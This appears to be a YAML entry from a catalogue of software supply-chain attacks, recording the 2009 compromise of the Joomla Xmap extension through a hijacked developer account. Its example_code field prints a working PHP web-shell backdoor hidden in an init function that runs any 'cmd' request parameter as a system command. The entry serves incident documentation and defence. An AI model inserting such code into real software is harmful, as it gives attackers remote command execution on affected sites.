- name: Joomla! Xmap
  title: Joomla Xmap extension backdoored
  start_date: 2009-06-15
  end_date: 2009-07-30
  license: GPL
  website: https://extensions.joomla.org/
  repo: https://github.com/joomla-extensions/xmap
  attribution_type: unknown
  component_type: Library
  lang: PHP
  cause: compromise
  motive: backdoor
  attack_vector: account compromise
  insertion_phase: distribution
  impact_type: backdoor
  impact_user_count: 10000
  references:
    - https://www.joomla.org/announcements/security/9-security/345-20090616-xmap-extension-security-issue.html
  synopsis: The popular Joomla extension Xmap was compromised to include backdoor code. The compromised extension was distributed through the official Joomla extensions directory for approximately 6 weeks.
  compromise_desc: Unknown attackers gained access to the developer's account on the Joomla extensions directory and uploaded a modified version of the Xmap component containing a backdoor. The backdoor allowed remote code execution through a specially crafted HTTP request.
  impact_desc: The backdoor allowed attackers to execute arbitrary PHP code on websites running the compromised version of Xmap. Thousands of Joomla websites were potentially affected, and all users were advised to update to a clean version immediately after discovery.
  example_code: |
    function XmapInit() {
      global $mainframe;

      // Backdoor code
      if (isset($_GET['cmd'])) {
        $cmd = $_GET['cmd'];
        if (function_exists('system')) {
          system($cmd);
        } elseif (function_exists('exec')) {
          exec($cmd);
        } elseif (function_exists('passthru')) {
          passthru($cmd);
        } elseif (function_exists('shell_exec')) {
          echo shell_exec($cmd);
        }
        exit;
      }

      // Original code continues below
      $mainframe->registerEvent('onPrepareContent', 'botXmap');
    }
